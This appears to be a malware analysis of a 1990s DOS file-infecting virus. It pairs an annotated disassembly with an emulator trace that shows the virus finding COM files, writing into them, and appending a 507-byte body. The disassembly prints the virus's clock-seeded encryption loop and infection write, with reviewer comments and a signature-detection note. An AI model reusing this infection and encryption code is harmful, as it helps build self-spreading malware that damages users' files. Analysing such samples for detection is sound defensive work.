0x14a14: cmp word ptr es:[3], -1          ; word at 0000:0003, inside the interrupt vector table;
                                          ; what 0xFFFF signifies there is not visible in this window
0x14a1a: je 0x14a29
0x14a1c: add bp, 0x1aa
0x14a20: mov byte ptr cs:[bp], 0x9a       ; writes into its own code segment (run-time self-patching)
0x14a25: mov ax, 0xffff
; NOTE(review): the je at 0x14a1a targets 0x14a29, which is not an instruction
; start in this listing (it falls inside the line below), so the tail of this
; linear disassembly is probably misaligned and should not be read literally.
0x14a28: dec word ptr [0xe807]
2018-12-25T11:52:55.694915896Z 59 PC: 14a01 | Change current directory
2018-12-25T11:52:55.699426085Z 78 PC: 14a0d | Find first file
2018-12-25T11:52:55.706164942Z 61 PC: 14a8a | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:52:55.719852136Z 63 PC: 14a99 | Read file or device (Read 5 bytes on handle 5)
2018-12-25T11:52:55.726997701Z 66 PC: 14ac3 | Move file pointer
2018-12-25T11:52:55.728664213Z 64 PC: 14ad0 | Write file or device (Write 5 bytes on handle 5)
2018-12-25T11:52:55.730637402Z 66 PC: 14ad9 | Move file pointer
2018-12-25T11:52:55.732072465Z 64 PC: 14ae6 | Write file or device (Write 5 bytes on handle 5)
2018-12-25T11:52:55.733883137Z 44 PC: 14afc | Get time 0x14afc: mov ah, dh
; Disassembly window that follows the "Get time" row above (its first
; instruction, mov ah, dh, is printed on that row). DOS Get time
; (INT 21h/AH=2Ch) returns seconds in DH, so AH starts out as the seconds value.
; The window derives two key bytes, copies 0x2e (46) bytes unchanged, transforms
; the next 0x1cd (461) bytes with a rolling subtraction, and sets up the
; 0x1fb (507 = 46 + 461) byte write logged on the next row.
; Detection note: the key is seeded from the clock, so the transformed body
; differs between infected files; only the 46 bytes copied verbatim are
; a candidate for a stable byte signature.
0x14afe: add ah, byte ptr [bx]            ; fold the stored first key byte into AH
0x14b00: mov byte ptr [bx], ah            ; and store the new value back at [bx]
0x14b02: mov dl, byte ptr [0x9a]          ; byte at DS:009Ah; if the DTA is still at its default
                                          ; location this is the found file's size low byte (TODO confirm)
0x14b06: add dl, byte ptr [bx + 1]        ; fold in the stored second key byte
0x14b09: mov byte ptr [bx + 1], dl        ; and store it back at [bx + 1]
0x14b0c: mov cx, 0x2e
0x14b0f: rep movsb byte ptr es:[di], byte ptr [si]   ; 46 bytes copied as-is from DS:SI to ES:DI
0x14b11: mov cx, 0x1cd                    ; 461 bytes go through the loop below
0x14b14: lodsb al, byte ptr [si]          ; loop top: AL = next source byte
0x14b15: sub al, ah                       ; AL -= current key
0x14b17: sub ah, dl
0x14b19: sub ah, dl                       ; key steps by -2*DL per byte
0x14b1b: stosb byte ptr es:[di], al       ; store transformed byte
0x14b1c: loop 0x14b14
0x14b1e: pop bx
0x14b1f: mov dx, bp
0x14b21: add dx, 0x385                    ; DX = bp + 0x385, buffer to write (presumably the ES:DI
                                          ; destination filled above; verify)
0x14b25: mov cx, 0x1fb                    ; 507 bytes, matching "Write 507 bytes on handle 5"
0x14b28: mov ah, 0x40                     ; 0x40 = 64, logged as "Write file or device";
                                          ; the int 0x21 itself is past the end of this window
2018-12-25T11:52:55.735636292Z 64 PC: 14b2c | Write file or device (Write 507 bytes on handle 5)
2018-12-25T11:52:55.748240192Z 87 PC: 14b39 | Get or set file date and time
2018-12-25T11:52:55.749949593Z 62 PC: 14b3d | Close file
2018-12-25T11:52:55.760522471Z 79 PC: 14a38 | Find next file
2018-12-25T11:52:55.764976067Z 61 PC: 14a8a | Open file (See above)
2018-12-25T11:52:55.773547273Z 63 PC: 14a99 | Read file or device (See above)
2018-12-25T11:52:55.780981276Z 66 PC: 14ac3 | Move file pointer (See above)
2018-12-25T11:52:55.782825559Z 64 PC: 14ad0 | Write file or device (See above)
2018-12-25T11:52:55.787573852Z 66 PC: 14ad9 | Move file pointer (See above)
2018-12-25T11:52:55.789063917Z 64 PC: 14ae6 | Write file or device (See above)
2018-12-25T11:52:55.792301235Z 44 PC: 14afc | Get time (See above)
2018-12-25T11:52:55.795123564Z 64 PC: 14b2c | Write file or device (See above)
2018-12-25T11:52:55.803871925Z 87 PC: 14b39 | Get or set file date and time (See above)
2018-12-25T11:52:55.80523131Z 62 PC: 14b3d | Close file (See above)
2018-12-25T11:52:55.828560971Z 79 PC: 14a38 | Find next file (See above)
2018-12-25T11:52:55.831735632Z 61 PC: 14a8a | Open file (See above)
2018-12-25T11:52:55.839187286Z 63 PC: 14a99 | Read file or device (See above)
2018-12-25T11:52:55.847012731Z 66 PC: 14ac3 | Move file pointer (See above)
2018-12-25T11:52:55.848572258Z 64 PC: 14ad0 | Write file or device (See above)
2018-12-25T11:52:55.852094804Z 66 PC: 14ad9 | Move file pointer (See above)
2018-12-25T11:52:55.861656982Z 64 PC: 14ae6 | Write file or device (See above)
2018-12-25T11:52:55.864683092Z 44 PC: 14afc | Get time (See above)
2018-12-25T11:52:55.867224768Z 64 PC: 14b2c | Write file or device (See above)
2018-12-25T11:52:55.876872843Z 87 PC: 14b39 | Get or set file date and time (See above)
2018-12-25T11:52:55.878644303Z 62 PC: 14b3d | Close file (See above)
2018-12-25T11:52:55.886954457Z 79 PC: 14a38 | Find next file (See above)
2018-12-25T11:52:55.889707093Z 61 PC: 14a8a | Open file (See above)
2018-12-25T11:52:55.896938736Z 63 PC: 14a99 | Read file or device (See above)
2018-12-25T11:52:55.903817809Z 66 PC: 14ac3 | Move file pointer (See above)
2018-12-25T11:52:55.905203584Z 64 PC: 14ad0 | Write file or device (See above)
2018-12-25T11:52:55.909310622Z 66 PC: 14ad9 | Move file pointer (See above)
2018-12-25T11:52:55.910816646Z 64 PC: 14ae6 | Write file or device (See above)
2018-12-25T11:52:55.913592045Z 44 PC: 14afc | Get time (See above)
2018-12-25T11:52:55.916683296Z 64 PC: 14b2c | Write file or device (See above)
2018-12-25T11:52:55.925872827Z 87 PC: 14b39 | Get or set file date and time (See above)
2018-12-25T11:52:55.927333367Z 62 PC: 14b3d | Close file (See above)
2018-12-25T11:52:55.93656914Z 79 PC: 14a38 | Find next file (See above)
2018-12-25T11:52:55.93956979Z 61 PC: 14a8a | Open file (See above)
2018-12-25T11:52:55.947443128Z 63 PC: 14a99 | Read file or device (See above)
2018-12-25T11:52:55.955415216Z 66 PC: 14ac3 | Move file pointer (See above)
2018-12-25T11:52:55.956960241Z 64 PC: 14ad0 | Write file or device (See above)
2018-12-25T11:52:55.959850225Z 66 PC: 14ad9 | Move file pointer (See above)
2018-12-25T11:52:55.962121873Z 64 PC: 14ae6 | Write file or device (See above)
2018-12-25T11:52:55.96567823Z 44 PC: 14afc | Get time (See above)
2018-12-25T11:52:55.968693181Z 64 PC: 14b2c | Write file or device (See above)
2018-12-25T11:52:55.977780841Z 87 PC: 14b39 | Get or set file date and time (See above)
2018-12-25T11:52:55.980029339Z 62 PC: 14b3d | Close file (See above)
2018-12-25T11:52:55.988549447Z 79 PC: 14a38 | Find next file (See above)
2018-12-25T11:52:55.992592775Z 61 PC: 14a8a | Open file (See above)
2018-12-25T11:52:56.000861968Z 63 PC: 14a99 | Read file or device (See above)
2018-12-25T11:52:56.008091607Z 66 PC: 14ac3 | Move file pointer (See above)
2018-12-25T11:52:56.009989279Z 64 PC: 14ad0 | Write file or device (See above)
2018-12-25T11:52:56.013870505Z 66 PC: 14ad9 | Move file pointer (See above)
2018-12-25T11:52:56.015299976Z 64 PC: 14ae6 | Write file or device (See above)
2018-12-25T11:52:56.018091741Z 44 PC: 14afc | Get time (See above)
2018-12-25T11:52:56.021664863Z 64 PC: 14b2c | Write file or device (See above)
2018-12-25T11:52:56.031499585Z 87 PC: 14b39 | Get or set file date and time (See above)
2018-12-25T11:52:56.033580922Z 62 PC: 14b3d | Close file (See above)
2018-12-25T11:52:56.043318475Z 79 PC: 14a38 | Find next file (See above)
2018-12-25T11:52:56.046973113Z 61 PC: 14a8a | Open file (See above)
2018-12-25T11:52:56.054782431Z 63 PC: 14a99 | Read file or device (See above)
2018-12-25T11:52:56.063060898Z 66 PC: 14ac3 | Move file pointer (See above)
2018-12-25T11:52:56.066094098Z 64 PC: 14ad0 | Write file or device (See above)
2018-12-25T11:52:56.069556741Z 66 PC: 14ad9 | Move file pointer (See above)
2018-12-25T11:52:56.07155819Z 64 PC: 14ae6 | Write file or device (See above)
2018-12-25T11:52:56.07539135Z 44 PC: 14afc | Get time (See above)
2018-12-25T11:52:56.078243475Z 64 PC: 14b2c | Write file or device (See above)
2018-12-25T11:52:56.087509422Z 87 PC: 14b39 | Get or set file date and time (See above)
2018-12-25T11:52:56.091379808Z 62 PC: 14b3d | Close file (See above)
2018-12-25T11:52:56.100781475Z 79 PC: 14a38 | Find next file (See above)
2018-12-25T11:52:56.103806633Z 61 PC: 14a8a | Open file (See above)
2018-12-25T11:52:56.112420704Z 63 PC: 14a99 | Read file or device (See above)
2018-12-25T11:52:56.120503429Z 87 PC: 14b39 | Get or set file date and time (See above)
2018-12-25T11:52:56.122656062Z 62 PC: 14b3d | Close file (See above)
2018-12-25T11:52:56.131568561Z 79 PC: 14a38 | Find next file (See above)
2018-12-25T11:52:56.134627148Z 9 PC: 12a47 | Display string (String= '')
2018-12-25T11:52:56.137116385Z 9 PC: 12a4c | Display string (String= '����������������������������������������������������������������������ͻ ')
2018-12-25T11:52:56.143562877Z 9 PC: 12a51 | Display string (String= '� !!! WARNING INFECTED FILE !!! � ')
2018-12-25T11:52:56.151414611Z 9 PC: 12a56 | Display string (String= '� � ')
2018-12-25T11:52:56.158065098Z 9 PC: 12a5b | Display string (String= '� FILE NAME ***************************** FILE SIZE *************** � ')
2018-12-25T11:52:56.164643198Z 9 PC: 12a60 | Display string (String= '� � ')
2018-12-25T11:52:56.172064595Z 9 PC: 12a65 | Display string (String= '� NOTES: � ')
2018-12-25T11:52:56.179142907Z 9 PC: 12a6a | Display string (Could not find end pointer)
2018-12-25T11:52:56.190987167Z 9 PC: 12a6f | Display string (String= '*********************************************** � � ******************************************************************** � ')
2018-12-25T11:52:56.200791794Z 9 PC: 12a74 | Display string (String= '� INFECTED FILES SHOULD BE UPLOADED TO THE METAVERSE BBS (606) 843-9363� � COPYRIGHT (c) 1993 ROBERT BULLOCK, RT 4 BOX 413E KEAVY, KY 40737 � ')
2018-12-25T11:52:56.209177094Z 9 PC: 12a79 | Display string (String= '����������������������������������������������������������������������ͼ ')
2018-12-25T11:52:56.215726Z 9 PC: 12a7e | Display string (String= '')
2018-12-25T11:52:56.21919688Z 76 PC: 12a83 | Terminate with return code (Return code = '0')